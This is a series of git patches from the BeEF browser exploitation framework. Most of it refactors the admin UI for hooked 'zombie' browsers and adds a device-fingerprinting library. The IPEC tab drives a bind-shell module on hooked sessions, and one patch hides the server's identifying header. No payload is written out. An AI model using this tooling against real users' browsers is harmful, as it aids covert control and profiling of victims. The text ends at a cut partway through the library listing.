@@ -111,7 +111,7 @@ function generate_form_input_field(form, input, value, disabled, zombie) {
         input_field.setDisabled(true);
 
     form.add(input_field);
-};
+}
 
 function get_rest_token(){
     var token = "";
@@ -157,7 +157,6 @@ function process_module_opts(mod){
        'mod_id': mod['id'],
        'mod_input':[]
     };
-    console.log("mod_id: " + mod['id']);
    var opts = mod['options'];
    var label='ui_label';
    var type = 'type';
@@ -173,7 +172,7 @@ function process_module_opts(mod){
            input = {};
            key = opts[i]['name'];
            value = opts[i]['value'];
-           type_val = opts[i]['type']
+           type_val = opts[i]['type'];
            label_val = opts[i][label];
            input[key]=value;
            input[label]=label_val;
@@ -355,7 +354,7 @@ ZombieTab_Autorun = function(zombie) {
         selModel:Ext.tree.MultiSelectionModel,
         items:[command_module_tree,details_panel],
     });
-}
+};
 
 Ext.extend(ZombieTab_Autorun, Ext.Panel, {
     listeners: {close: function(panel) {}}

From b6b968a7a0433571cafaa5ad4798bcc2abfcae4b Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 18:33:57 +0100
Subject: [PATCH 133/397] ARE:  removed a couple of unneeded commas.

---
 .../media/javascript/ui/panel/tabs/ZombieTabAutorun.js      | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index 8564c27f5..b9f7b7909 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -212,7 +212,7 @@ ZombieTab_Autorun = function(zombie) {
         border: true,
         width: 250,
         minSize: 250,
-        maxSize: 500,
+        maxSize: 500
     });
 
     var list_panel = new Ext.Panel({
@@ -222,7 +222,7 @@ ZombieTab_Autorun = function(zombie) {
         border: true,
         width: 190,
         minSize: 190,
-        maxSize: 500,
+        maxSize: 500
     });
 
     var command_module_tree = new Ext.tree.TreePanel({
@@ -352,7 +352,7 @@ ZombieTab_Autorun = function(zombie) {
         layoutConfig:{align:'stretch'},
         region: 'center',
         selModel:Ext.tree.MultiSelectionModel,
-        items:[command_module_tree,details_panel],
+        items:[command_module_tree,details_panel]
     });
 };
 

From 1cd83663aa9b016a70b98a141b8e94550a818482 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 18:37:26 +0100
Subject: [PATCH 134/397] ARE:  properly closed a couple of more statements.

---
 .../media/javascript/ui/panel/tabs/ZombieTabAutorun.js        | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index b9f7b7909..2b1746dbc 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -50,7 +50,7 @@ function generate_form_input_field(form, input, value, disabled, zombie) {
             input_field = new Ext.form.Hidden(input_def);
             break;
         case 'label':
-            input_def['fieldLabel'] = ''
+            input_def['fieldLabel'] = '';
             input_def['html'] = input['html'];
             input_field = new Ext.form.Label(input_def);
             break;
@@ -161,7 +161,7 @@ function process_module_opts(mod){
    var label='ui_label';
    var type = 'type';
    var type_val;
-   var label_val
+   var label_val;
    var value;
    var type;
    var key = value = label = type_val = "";

From cea8a4b0e3ab12ebaa13eb10b018fb26f54e288d Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 19:03:27 +0100
Subject: [PATCH 135/397] ARE:  fixed bug which was preventing the execution of
 modules without input.

---
 .../javascript/ui/panel/tabs/ZombieTabAutorun.js     | 12 +++---------
 1 file changed, 3 insertions(+), 9 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index 2b1746dbc..15bf772e4 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -179,8 +179,8 @@ function process_module_opts(mod){
            input[type] = type_val;
            mod_json['mod_input'].push(input);
        }
-   return mod_json;
    }
+   return mod_json;
 }
 
 function send_modules(token,module_data){
@@ -259,17 +259,12 @@ ZombieTab_Autorun = function(zombie) {
                     Ext.each(sel_nodes,function(item){
                         var id = item.id;
                         var module = get_module_details(id,token);
-                        var mod_json = {
-                            'mod_id': id,
-                            'mod_input':[]
-                        };
-
                         module = process_module_opts(module);
                         mods_to_send['modules'].push(module);
                     });
                     send_modules(token,mods_to_send);
-                }
-                else {
+                }else {
+                    //TODO: handle this case
                 }
          }})],
          loader: new Ext.tree.TreeLoader({
@@ -339,7 +334,6 @@ ZombieTab_Autorun = function(zombie) {
                     });
                     node.collapse();
                 }
-
             }
         }
     });

From 1ce620a62632f5e73ad8deb37c30adc3cdb570d4 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 20:07:49 +0100
Subject: [PATCH 136/397] Created a new beef_common.js files with common
 functions for the Web UI. Registered as beefwui in the main window object.

---
 .../admin_ui/controllers/panel/index.html     |  6 ++-
 .../media/javascript/ui/common/beef_common.js | 44 +++++++++++++++++++
 2 files changed, 49 insertions(+), 1 deletion(-)
 create mode 100644 extensions/admin_ui/media/javascript/ui/common/beef_common.js

diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index a104a41e8..dbc9a42ef 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -13,12 +13,16 @@
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
 	<%= script_tag 'ext-beef.js' %>
+
 	<!-- jQuery encoder (ESAPI way) -->
 	<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
 	<%= script_tag 'esapi/Class.create.js' %>
 	<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
 	<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
-	<!--/ jQuery encoder (ESAPI way) -->
+
+    <!-- BeEF Web UI common functions-->
+    <%= script_tag 'ui/common/beef_common.js' %>
+
 	<%= script_tag 'ux/TabCloseMenu.js' %>
 	<%= script_tag 'ux/StatusBar.js' %>
 	<%= script_tag 'ux/PagingStore.js' %>
diff --git a/extensions/admin_ui/media/javascript/ui/common/beef_common.js b/extensions/admin_ui/media/javascript/ui/common/beef_common.js
new file mode 100644
index 000000000..1687dc33f
--- /dev/null
+++ b/extensions/admin_ui/media/javascript/ui/common/beef_common.js
@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * BeEF Web UI commons
+ */
+
+if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
+
+    var BeefWUI = {
+
+        rest_token: "",
+
+        /**
+         * Retrieve the token needed to call the RESTful API.
+         * This is obviously a post-auth call.
+         */
+        get_rest_token: function() {
+            if(this.rest_token.length == 0){
+                var url = "/ui/modules/getRestfulApiToken.json";
+                jQuery.ajax({
+                    contentType: 'application/json',
+                    dataType: 'json',
+                    type: 'GET',
+                    url: url,
+                    async: false,
+                    processData: false,
+                    success: function(data){
+                        beefwui.rest_token = data.token;
+                    },
+                    error: function(){
+                        beefwui.rest_token = "";
+                    }
+                });
+            }
+            return this.rest_token;
+        }
+    };
+
+    window.beefwui = BeefWUI;
+}

From c0a256f1b07a926730ecaa74bd688774c4b54faa Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Jan 2013 20:09:23 +0100
Subject: [PATCH 137/397] Refactored Ipec and Autorun tabs to use the new
 beefwui object: get_rest_token is now a common function :D

---
 .../ui/panel/tabs/ZombieTabAutorun.js         | 22 +---------------
 .../javascript/ui/panel/tabs/ZombieTabIpec.js | 25 ++-----------------
 2 files changed, 3 insertions(+), 44 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index 15bf772e4..2257ee14e 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -113,26 +113,6 @@ function generate_form_input_field(form, input, value, disabled, zombie) {
     form.add(input_field);
 }
 
-function get_rest_token(){
-    var token = "";
-    var url = "/ui/modules/getRestfulApiToken.json";
-    $jwterm.ajax({
-        contentType: 'application/json',
-        dataType: 'json',
-        type: 'GET',
-        url: url,
-        async: false,
-        processData: false,
-        success: function(data){
-            token = data.token;
-        },
-        error: function(){
-            console.log("Error getting RESTful API token");
-        }
-    });
-    return token;
-}
-
 function get_module_details(id,token){
     var mod = null;
     var url = "/api/modules/"+id+"?token="+token;
@@ -203,7 +183,7 @@ function send_modules(token,module_data){
     /* Creates the same tree as the command module list*/
 ZombieTab_Autorun = function(zombie) {
 
-    var token = get_rest_token();
+    var token = beefwui.get_rest_token();
 
     var details_panel = new Ext.FormPanel({
         id: "zombie-autorun_details"+zombie.session,
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
index 523329acd..bbc7c5f36 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
@@ -19,27 +19,6 @@ ZombieTab_IpecTab = function(zombie) {
         autoscroll: true
 	});
 
-    function get_rest_token(){
-        var token = "";
-        var url = "/ui/modules/getRestfulApiToken.json";
-        $jwterm.ajax({
-            contentType: 'application/json',
-            dataType: 'json',
-            type: 'GET',
-            url: url,
-            async: false,
-            processData: false,
-            success: function(data){
-                token = data.token;
-                console.log(token);
-            },
-            error: function(){
-                console.log("Error getting RESTful API token");
-            }
-        });
-        return token;
-    }
-
     function get_module_id(name, token){
         var id = "";
         var url = "/api/modules/search/" + name + "?token=" + token;
@@ -115,7 +94,7 @@ ZombieTab_IpecTab = function(zombie) {
                 var cmd = tokens.join(' '); //needed in case of commands with options
                 cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped)
 
-                var token = get_rest_token();
+                var token = beefwui.get_rest_token();
                 var mod_id = get_module_id("BeEF_bind_shell", token);
 
                 var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token;
@@ -148,7 +127,7 @@ ZombieTab_IpecTab = function(zombie) {
 
                 if(command_id != null){
 
-                    var token = get_rest_token();
+                    var token = beefwui.get_rest_token();
                     var mod_id = get_module_id("BeEF_bind_shell", token);
 
                     var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/"

From 12fe2ed86cea259de6f27c965f33c31f803fc423 Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Thu, 3 Jan 2013 07:31:34 +1000
Subject: [PATCH 138/397] LiveCD - updated links and copyright year

---
 liveCD/BeEFLive.sh | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index c8a74ed0c..be85fec51 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'home/beef/doc/COPYING' for copying permission
 #
@@ -9,7 +9,8 @@
 #
 # This is the auto startup script for the BeEF Live CD. 
 # IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: https://github.com/beefproject/beef/downloads
+# Download LiveCD here: http://beefproject.com/BeEFLive1.2.iso
+# MD5 (BeEFLive1.2.iso) = 1bfba0942a3270ee977ceaeae5a6efd2
 #
 # This script contains a few fixes to make BeEF play nicely with the way  
 # remastersys creates the live cd distributable as well as generating host keys 

From cae2559fa38edb0b0a4dedeb5bbeb2c2b54e6505 Mon Sep 17 00:00:00 2001
From: Phill Campbell <phillcampbell@me.com>
Date: Wed, 2 Jan 2013 23:29:21 +0000
Subject: [PATCH 139/397] Remove Thin 'Server' response header

---
 core/main/server.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/core/main/server.rb b/core/main/server.rb
index c7e3ab898..51bb3613a 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -4,6 +4,10 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+# Remove Thin 'Server' response header
+Thin.send :remove_const, :SERVER
+Thin::SERVER = nil
+
 module BeEF
   module Core
 

From 9c6802cd8fab87eb78df32187f01040a06e78c13 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Thu, 3 Jan 2013 19:25:00 +0800
Subject: [PATCH 140/397] Updated QR Code Extension - URLs can now be full, not
 just sub-domains #811

---
 extensions/qrcode/qrcode.rb | 39 ++++++++++++++++++++++++++++++-------
 1 file changed, 32 insertions(+), 7 deletions(-)

diff --git a/extensions/qrcode/qrcode.rb b/extensions/qrcode/qrcode.rb
index ed7587529..791ffe40f 100644
--- a/extensions/qrcode/qrcode.rb
+++ b/extensions/qrcode/qrcode.rb
@@ -13,18 +13,43 @@ module Qrcode
     
     def self.pre_http_start(http_hook_server)
       require 'uri'
-      
+
+      fullurls = []
+      partialurls = []
+
       configuration = BeEF::Core::Configuration.instance
-      BeEF::Core::Console::Banners.interfaces.each do |int|
-        next if int == "localhost" or int == "127.0.0.1"
-        print_success "QRCode images available for interface: #{int}"
+
+      configuration.get("beef.extension.qrcode.target").each do |target|
+        if target.lines.grep(/^https?:\/\//i).size > 0
+          fullurls << target
+        else
+          partialurls << target
+        end
+      end
+
+      if fullurls.size > 0
+        print_success "Custom QRCode images available:"
         data = ""
-        configuration.get("beef.extension.qrcode.target").each do |target|
-          url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
-          url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
+        fullurls.each do |target|
+          url = URI.escape(target,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
           data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
         end
         print_more data
+
+      end
+      
+      if partialurls.size > 0
+        BeEF::Core::Console::Banners.interfaces.each do |int|
+          next if int == "localhost" or int == "127.0.0.1"
+          print_success "QRCode images available for interface: #{int}"
+          data = ""
+          partialurls.each do |target|
+            url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
+            url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
+            data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
+          end
+          print_more data
+        end
       end
     end  
     

From 3fe37ec7b1702f8eeada4c6e65642dff202e04a5 Mon Sep 17 00:00:00 2001
From: Nbblrr <nbblrr@gmail.com>
Date: Sat, 5 Jan 2013 00:03:25 +0100
Subject: [PATCH 141/397] Improved Hardware detection with mdetect. Ticket #722

---
 core/main/client/hardware.js         |  70 +-
 core/main/client/lib/mdetect.js      | 961 +++++++++++++++++++++++++++
 core/main/handlers/modules/beefjs.rb |   4 +-
 extensions/evasion/config.yaml       |   2 +-
 4 files changed, 1015 insertions(+), 22 deletions(-)
 create mode 100644 core/main/client/lib/mdetect.js

diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index 5e64e9ab2..01f69dc50 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -7,11 +7,11 @@
 beef.hardware = {
 
 	ua: navigator.userAgent,
-	
+
 	isWinPhone: function() {
 		return (this.ua.match('(Windows Phone)')) ? true : false;
 	},
-	
+
 	isIphone: function() {
 		return (this.ua.indexOf('iPhone') != -1) ? true : false;
 	},
@@ -48,10 +48,6 @@ beef.hardware = {
 		return (this.ua.match('Ericsson')) ? true : false;
 	},
 
-	isNokia: function() {
-		return (this.ua.match('Nokia')) ? true : false;
-	},
-
 	isMotorola: function() {
 		return (this.ua.match('Motorola')) ? true : false;
 	},
@@ -60,20 +56,56 @@ beef.hardware = {
 		return (this.ua.match('Nexus One')) ? true : false;
 	},
 
-	getName: function() {
+        /**
+         * Returns true if the browser is on a Mobile Phone
+         * @return: {Boolean} true or false
+         *
+         * @example: if(beef.browser.isMobilePhone()) { ... }
+         **/
+        isMobilePhone: function() {
+            return DetectMobileQuick();
+        },
 
-		if (this.isNokia()) return 'Nokia';
-		if (this.isWinPhone()) return 'Windows Phone';
-		if (this.isBlackBerry()) return 'BlackBerry';
-		if (this.isIphone()) return 'iPhone';
-		if (this.isIpad()) return 'iPad';
-		if (this.isIpod()) return 'iPod';
-		if (this.isKindle()) return 'Kindle';
-		if (this.isHtc()) return 'HTC';
-		if (this.isMotorola()) return 'Motorola';
-		if (this.isZune()) return 'Zune';
-		if (this.isGoogle()) return 'Google';
-		if (this.isEricsson()) return 'Ericsson';
+	getName: function() {
+                var ua = navigator.userAgent;
+                if(DetectIphone())              { return "iPhone"};
+                if(DetectIpod())                { return "iPod Touch"};
+                if(DetectIpad())                { return "iPad"};
+		if (this.isHtc())               { return 'HTC'};
+		if (this.isMotorola())          { return 'Motorola'};
+		if (this.isZune())              { return 'Zune'};
+		if (this.isGoogle())            { return 'Google'};
+		if (this.isEricsson())          { return 'Ericsson'};
+                if(DetectAndroidPhone())        { return "Android Phone"};
+                if(DetectAndroidTablet())       { return "Android Tablet"};
+                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia Symbian"};
+		if (this.isNokia())             { return 'Nokia'};
+                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+                if(DetectWindowsMobile())       { return "Windows Mobile"};
+                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+                if(DetectBlackBerry())          { return "BlackBerry"};
+                if(DetectPalmOS())              { return "Palm OS"};
+                if(DetectPalmWebOS())           { return "Palm Web OS"};
+                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+                if(DetectArchos())              { return "Archos"}
+                if(DetectBrewDevice())          { return "Brew"};
+                if(DetectDangerHiptop())        { return "Danger Hiptop"};
+                if(DetectMaemoTablet())         { return "Maemo Tablet"};
+                if(DetectSonyMylo())            { return "Sony Mylo"};
+                if(DetectAmazonSilk())          { return "Kindle Fire"};
+                if(DetectKindle())              { return "Kindle"};
+                if(DetectSonyPlaystation())                 { return "Playstation" };
+                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+                if(DetectXbox())                            { return "Xbox"};
 
 		return 'Unknown';
 	}
diff --git a/core/main/client/lib/mdetect.js b/core/main/client/lib/mdetect.js
new file mode 100644
index 000000000..85de2b29e
--- /dev/null
+++ b/core/main/client/lib/mdetect.js
@@ -0,0 +1,961 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+//
+// File version date: April 23, 2012
+//		Update:
+//		- Updated DetectAmazonSilk(): Fixed an issue in the detection logic.
+//
+// File version date: April 22, 2012 - Second update
+//		Update: To address additional Kindle issues...
+//		- Updated DetectRichCSS(): Excluded e-Ink Kindle devices.
+//		- Created DetectAmazonSilk(): Created to detect Kindle Fire devices in Silk mode.
+//		- Updated DetectMobileQuick(): Updated to include e-Ink Kindle devices and the Kindle Fire in Silk mode.
+//
+// File version date: April 11, 2012
+//		Update:
+//		- Added a new variable for the new BlackBerry Curve Touch (9380): deviceBBCurveTouch.
+//		- Updated DetectBlackBerryTouch() to support the new BlackBerry Curve Touch (9380).
+//
+// File version date: January 21, 2012
+//		Update:
+//		- Moved Windows Phone 7 to the iPhone Tier. WP7.5's IE 9-based browser is good enough now.
+//		- Added a new variable for 2 versions of the new BlackBerry Bold Touch (9900 and 9930): deviceBBBoldTouch.
+//		- Updated DetectBlackBerryTouch() to support the 2 versions of the new BlackBerry Bold Touch (9900 and 9930).
+//		- Updated DetectKindle() to focus on eInk devices only. The Kindle Fire should be detected as a regular Android device.
+//
+// File version date: August 22, 2011
+//		Update:
+//		- Updated DetectAndroidTablet() to fix a bug introduced in the last fix! The true/false returns were mixed up.
+//
+// File version date: August 16, 2011
+//		Update:
+//		- Updated DetectAndroidTablet() to exclude Opera Mini, which was falsely reporting as running on a tablet device when on a phone.
+//		- Updated the user agent (uagent) init technique to handle spiders and such with null values.
+//
+//
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+//
+//
+// ABOUT THIS PROJECT
+//   Project Owner: Anthony Hand
+//   Email: anthony.hand@gmail.com
+//   Web Site: http://www.mobileesp.com
+//   Source Files: http://code.google.com/p/mobileesp/
+//
+//   Versions of this code are available for:
+//      PHP, JavaScript, Java, ASP.NET (C#), and Ruby
+//
+//
+// WARNING:
+//   These JavaScript-based device detection features may ONLY work
+//   for the newest generation of smartphones, such as the iPhone,
+//   Android and Palm WebOS devices.
+//   These device detection features may NOT work for older smartphones
+//   which had poor support for JavaScript, including
+//   older BlackBerry, PalmOS, and Windows Mobile devices.
+//   Additionally, because JavaScript support is extremely poor among
+//   'feature phones', these features may not work at all on such devices.
+//   For better results, consider using a server-based version of this code,
+//   such as Java, APS.NET, PHP, or Ruby.
+//
+// *******************************************
+*/
+
+//Optional: Store values for quickly accessing same info multiple times.
+//Note: These values are not set automatically.
+//Stores whether the device is an iPhone or iPod Touch.
+var isIphone = false;
+//Stores whether the device is an Android phone or multi-media player.
+var isAndroidPhone = false;
+//Stores whether is the Tablet (HTML5-capable, larger screen) tier of devices.
+var isTierTablet = false;
+//Stores whether is the iPhone tier of devices.
+var isTierIphone = false;
+//Stores whether the device can probably support Rich CSS, but JavaScript support is not assumed. (e.g., newer BlackBerry, Windows Mobile)
+var isTierRichCss = false;
+//Stores whether it is another mobile device, which cannot be assumed to support CSS or JS (eg, older BlackBerry, RAZR)
+var isTierGenericMobile = false;
+
+//Initialize some initial string variables we'll look for later.
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+//Initialize variables for mobile-specific content.
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+//Initialize variables for random devices and mobile browsers.
+//Some of these may not support JavaScript
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+//Use Maemo, Tablet, and Linux to test for Nokia's Internet Tablets.
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+//In some UserAgents, the only clue is the manufacturer.
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+//In some UserAgents, the only clue is the operator.
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+//Disambiguation strings.
+var disUpdate = "update"; //pda vs. update
+
+
+
+//Initialize our user agent string.
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+
+//**************************
+// Detects if the current device is an iPhone.
+function DetectIphone()
+{
+   if (uagent.search(deviceIphone) > -1)
+   {
+      //The iPad and iPod Touch say they're an iPhone! So let's disambiguate.
+      if (DetectIpad() || DetectIpod())
+         return false;
+      //Yay! It's an iPhone!
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is an iPod Touch.
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is an iPad tablet.
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is an iPhone or iPod Touch.
+function DetectIphoneOrIpod()
+{
+   //We repeat the searches here because some iPods
+   //  may report themselves as an iPhone, which is ok.
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+//**************************
+// Detects *any* iOS device: iPhone, iPod Touch, iPad.
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects *any* Android OS-based device: phone, tablet, and multi-media player.
+// Also detects Google TV.
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   //Special check for the HTC Flyer 7" tablet. It should report here.
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is a (small-ish) Android OS-based device
+// used for calling and/or multi-media (like a Samsung Galaxy Player).
+// Google says these devices will have 'Android' AND 'mobile' in user agent.
+// Ignores tablets (Honeycomb and later).
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
+   //Special check for Android phones with Opera Mobile. They should report here.
+   if (DetectOperaAndroidPhone())
+      return true;
+   //Special check for the HTC Flyer 7" tablet. It should report here.
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+//**************************
+// Detects if the current device is a (self-reported) Android tablet.
+// Google says these devices will have 'Android' and NOT 'mobile' in their user agent.
+function DetectAndroidTablet()
+{
+   //First, let's make sure we're on an Android device.
+   if (!DetectAndroid())
+      return false;
+
+   //Special check for Opera Android Phones. They should NOT report here.
+   if (DetectOperaMobile())
+      return false;
+   //Special check for the HTC Flyer 7" tablet. It should NOT report here.
